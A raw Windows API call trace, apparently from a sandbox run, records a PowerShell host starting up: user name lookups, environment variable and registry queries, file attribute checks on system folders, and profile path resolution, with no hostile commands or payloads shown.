	[0789.695] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b771630, nSize=0x14d1a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d1a8) returned 0x1
	[0789.696] CoTaskMemFree (pv=0x1b771630) 
	[0789.696] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0789.696] GetUserNameW (in: lpBuffer=0x2564a0, pcbBuffer=0x14d1e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d1e8) returned 1
	[0789.696] CoTaskMemFree (pv=0x2564a0) 
	[0789.696] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f538f8*="Certificate", lpRawData=0x2f53688) returned 1
	[0790.083] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0790.083] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.083] CoTaskMemFree (pv=0x2b14c0) 
	[0790.086] GetLogicalDrives () returned 0x4
	[0790.086] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14ce30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0790.087] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0790.088] CoTaskMemAlloc (cb=0x20e) returned 0x2acaa0
	[0790.088] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2acaa0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0790.088] CoTaskMemFree (pv=0x2acaa0) 
	[0790.089] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0790.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.089] CoTaskMemFree (pv=0x2b14c0) 
	[0790.090] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0790.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.090] CoTaskMemFree (pv=0x2b14c0) 
	[0790.110] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0790.110] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.110] CoTaskMemFree (pv=0x2b14c0) 
	[0790.114] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0790.114] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.114] CoTaskMemFree (pv=0x2b14c0) 
	[0790.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.115] SetErrorMode (uMode=0x1) returned 0x1
	[0790.115] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14cdf0 | out: lpFileInformation=0x14cdf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0790.115] SetErrorMode (uMode=0x1) returned 0x1
	[0790.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.115] SetErrorMode (uMode=0x1) returned 0x1
	[0790.115] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14cdf0 | out: lpFileInformation=0x14cdf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0790.115] SetErrorMode (uMode=0x1) returned 0x1
	[0790.116] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0790.116] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0790.116] CoTaskMemFree (pv=0x2b14c0) 
	[0790.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.118] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0790.119] SetErrorMode (uMode=0x1) returned 0x1
	[0790.119] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14cdb0 | out: lpFileInformation=0x14cdb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0790.119] SetErrorMode (uMode=0x1) returned 0x1
	[0790.119] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0790.119] SetErrorMode (uMode=0x1) returned 0x1
	[0790.119] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14cdb0 | out: lpFileInformation=0x14cdb0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0790.119] SetErrorMode (uMode=0x1) returned 0x1
	[0790.119] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0790.120] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14caa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0790.120] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0790.120] SetErrorMode (uMode=0x1) returned 0x1
	[0790.120] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14cdb0 | out: lpFileInformation=0x14cdb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0790.120] SetErrorMode (uMode=0x1) returned 0x1
	[0790.120] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0790.120] SetErrorMode (uMode=0x1) returned 0x1
	[0790.120] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14cdb0 | out: lpFileInformation=0x14cdb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0790.120] SetErrorMode (uMode=0x1) returned 0x1
	[0790.121] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0790.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0790.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.121] SetErrorMode (uMode=0x1) returned 0x1
	[0790.121] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14cdb0 | out: lpFileInformation=0x14cdb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0790.121] SetErrorMode (uMode=0x1) returned 0x1
	[0790.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.121] SetErrorMode (uMode=0x1) returned 0x1
	[0790.121] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14cdb0 | out: lpFileInformation=0x14cdb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0790.122] SetErrorMode (uMode=0x1) returned 0x1
	[0790.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.122] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0790.122] SetErrorMode (uMode=0x1) returned 0x1
	[0790.122] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14cdf0 | out: lpFileInformation=0x14cdf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0790.123] SetErrorMode (uMode=0x1) returned 0x1
	[0790.123] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0790.123] SetErrorMode (uMode=0x1) returned 0x1
	[0790.123] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14cdf0 | out: lpFileInformation=0x14cdf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0790.123] SetErrorMode (uMode=0x1) returned 0x1
	[0790.123] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0790.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0790.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.124] SetErrorMode (uMode=0x1) returned 0x1
	[0790.124] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14cdf0 | out: lpFileInformation=0x14cdf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0790.124] SetErrorMode (uMode=0x1) returned 0x1
	[0790.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.124] SetErrorMode (uMode=0x1) returned 0x1
	[0790.124] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14cdf0 | out: lpFileInformation=0x14cdf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0790.124] SetErrorMode (uMode=0x1) returned 0x1
	[0790.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0790.126] SetErrorMode (uMode=0x1) returned 0x1
	[0790.127] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d0b0 | out: lpFileInformation=0x14d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0790.127] SetErrorMode (uMode=0x1) returned 0x1
	[0791.148] CoTaskMemAlloc (cb=0x804) returned 0x1b771630
	[0791.148] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b771630, nSize=0x14d418 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14d418) returned 0x1
	[0791.148] CoTaskMemFree (pv=0x1b771630) 
	[0791.148] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0791.148] GetUserNameW (in: lpBuffer=0x2564a0, pcbBuffer=0x14d458 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14d458) returned 1
	[0791.148] CoTaskMemFree (pv=0x2564a0) 
	[0791.149] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f8c5e0*="Available", lpRawData=0x2f8c370) returned 1
	[0791.860] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0791.860] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.860] CoTaskMemFree (pv=0x2b14c0) 
	[0791.860] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0791.860] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.860] CoTaskMemFree (pv=0x2b14c0) 
	[0791.862] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0791.862] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0791.862] CoTaskMemFree (pv=0x2b14c0) 
	[0791.862] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0791.862] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0791.863] CoTaskMemFree (pv=0x2b14c0) 
	[0791.865] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d438 | out: phkResult=0x14d438*=0x384) returned 0x0
	[0791.865] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d3bc, lpData=0x0, lpcbData=0x14d3b8*=0x0 | out: lpType=0x14d3bc*=0x1, lpData=0x0, lpcbData=0x14d3b8*=0x56) returned 0x0
	[0791.865] CoTaskMemAlloc (cb=0x5a) returned 0x1b7634a0
	[0791.865] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d38c, lpData=0x1b7634a0, lpcbData=0x14d388*=0x56 | out: lpType=0x14d38c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d388*=0x56) returned 0x0
	[0791.865] CoTaskMemFree (pv=0x1b7634a0) 
	[0791.865] RegCloseKey (hKey=0x384) returned 0x0
	[0791.866] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0791.866] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.866] CoTaskMemFree (pv=0x2b14c0) 
	[0792.761] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0792.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.761] CoTaskMemFree (pv=0x2b14c0) 
	[0792.767] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0792.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.767] CoTaskMemFree (pv=0x2b14c0) 
	[0792.767] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0792.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.768] CoTaskMemFree (pv=0x2b14c0) 
	[0792.768] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0792.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.768] CoTaskMemFree (pv=0x2b14c0) 
	[0792.769] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0792.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.769] CoTaskMemFree (pv=0x2b14c0) 
	[0792.771] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0792.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.771] CoTaskMemFree (pv=0x2b14c0) 
	[0792.771] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0792.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.772] CoTaskMemFree (pv=0x2b14c0) 
	[0795.001] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0795.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0795.002] CoTaskMemFree (pv=0x2b14c0) 
	[0797.179] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2b1900
	[0797.181] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2b1a10
	[0802.090] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0802.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.090] CoTaskMemFree (pv=0x2b1b20) 
	[0802.095] CoTaskMemAlloc (cb=0x104) returned 0x2b1b20
	[0802.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1b20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0802.095] CoTaskMemFree (pv=0x2b1b20) 
	[0802.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0802.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0802.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0802.961] VirtualQuery (in: lpAddress=0x14b740, lpBuffer=0x14c600, dwLength=0x30 | out: lpBuffer=0x14c600*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0802.965] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d598 | out: phkResult=0x14d598*=0x390) returned 0x0
	[0802.965] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d51c, lpData=0x0, lpcbData=0x14d518*=0x0 | out: lpType=0x14d51c*=0x1, lpData=0x0, lpcbData=0x14d518*=0x56) returned 0x0
	[0802.965] CoTaskMemAlloc (cb=0x5a) returned 0x289310
	[0802.965] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d4ec, lpData=0x289310, lpcbData=0x14d4e8*=0x56 | out: lpType=0x14d4ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d4e8*=0x56) returned 0x0
	[0802.965] CoTaskMemFree (pv=0x289310) 
	[0802.966] RegCloseKey (hKey=0x390) returned 0x0
	[0802.966] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d598 | out: phkResult=0x14d598*=0x390) returned 0x0
	[0802.966] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d51c, lpData=0x0, lpcbData=0x14d518*=0x0 | out: lpType=0x14d51c*=0x1, lpData=0x0, lpcbData=0x14d518*=0x56) returned 0x0
	[0802.966] CoTaskMemAlloc (cb=0x5a) returned 0x289310
	[0802.966] RegQueryValueExW (in: hKey=0x390, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d4ec, lpData=0x289310, lpcbData=0x14d4e8*=0x56 | out: lpType=0x14d4ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d4e8*=0x56) returned 0x0
	[0802.966] CoTaskMemFree (pv=0x289310) 
	[0802.966] RegCloseKey (hKey=0x390) returned 0x0
	[0802.967] CoTaskMemAlloc (cb=0x20c) returned 0x1b73f700
	[0802.967] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b73f700 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0802.967] CoTaskMemFree (pv=0x1b73f700) 
	[0802.967] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0802.967] CoTaskMemAlloc (cb=0x20c) returned 0x1b73f700
	[0802.967] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b73f700 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0802.967] CoTaskMemFree (pv=0x1b73f700) 
	[0802.967] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d150, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0802.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
